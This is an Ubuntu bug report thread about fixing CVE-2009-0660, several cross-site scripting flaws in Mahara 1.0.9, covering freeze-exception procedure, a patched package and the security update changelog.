CVE-2009-0660 Multiple XSS vulnerabilities in Mahara 1.0.9

Thank you for using Ubuntu and taking the time to report a bug. Marking as public since upstream has a fix out. We are currently in FeatureFreeze so a patch to the existing package in Jaunty is needed.

Also, as this package is in universe and is community supported, perhaps you could prepare a debdiff for Intrepid to fix this by following https://wiki.ubuntu.com/SecurityUpdateProcedures. Thanks!

I understand that there is a feature freeze, but is a freeze exception needed even if the new upstream version doesn't introduce new features?

Mahara 1.0.x is currently the old stable version and so it only gets bug fixes (see the release notes at http://mahara.org/interaction/forum/topic.php?id=351).

Upgrading the Jaunty version now would fix a few bugs and would make it easier to apply future fixes if needed.

Since Jaunty is not released yet, I assumed that we didn't have to follow the regular security procedure and that we could just update to the latest upstream point release.

Since this package will require new packaging of the upstream source (as opposed to a simple sync request from Debian (sid and testing have 1.1 now)), it does require an FFE and the corresponding review. Once reviewed, it can be uploaded to Jaunty. See https://wiki.ubuntu.com/FreezeExceptionProcess for details.

As always, a patch/debdiff which follows https://wiki.ubuntu.com/SecurityUpdateProcedures is another option, and likely easier to get into Jaunty at this point in our release cycle.

Here's a patched 1.0.9-2 package which I have built and tested.

It is based on the upstream 1.0 patch that was sent to vendor-sec.

No point in fixing intrepid as that version of the package is completely unusable.

If Intrepid is unusable another bug should be filed against it detailing the problems, with the fixes (if you know them). A StableReleaseUpdate (SRU) could then be applied for that makes it usable again (and also fixing this security issue).

This bug was fixed in the package mahara - 1.0.9-2ubuntu0.2

---------------
mahara (1.0.9-2ubuntu0.2) jaunty; urgency=low

  * Upload to correct pocket

mahara (1.0.9-2ubuntu0.1) jaunty-security; urgency=low

  * SECURITY UPDATE: multiple cross-site scripting vulnerabilities in user
    profile data and blogs (LP: #340863)
    - debian/patches/CVE-2009-0660.dpatch: fixes from upstream advisory
    - http://mahara.org/interaction/forum/topic.php?id=350
    - CVE-2009-0660
  * Add dpatch support

 -- Jamie Strandboge <email address hidden> Thu, 19 Mar 2009 10:04:50 -0500

Intrepid Ibex reached end-of-life on 30 April 2010 so I am closing the
report. The bug has been fixed in newer releases of Ubuntu.